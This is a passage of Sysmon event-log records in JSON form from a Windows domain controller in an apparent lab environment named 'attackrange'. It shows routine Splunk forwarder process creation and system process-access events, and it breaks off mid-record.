{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7966,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.305\r\nProcessGuid: {41C8662E-2293-5F25-0000-001006AE0F00}\r\nProcessId: 2988\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.305","ProcessGuid":"{41C8662E-2293-5F25-0000-001006AE0F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7967,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.303\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-001006AE0F00}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.303","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-001006AE0F00}","TargetProcessId":"2988","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7968,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.303\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2293-5F25-0000-001006AE0F00}\r\nTargetProcessId: 2988\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.303","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2293-5F25-0000-001006AE0F00}","TargetProcessId":"2988","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7969,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7970,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7971,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7972,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7973,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7974,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 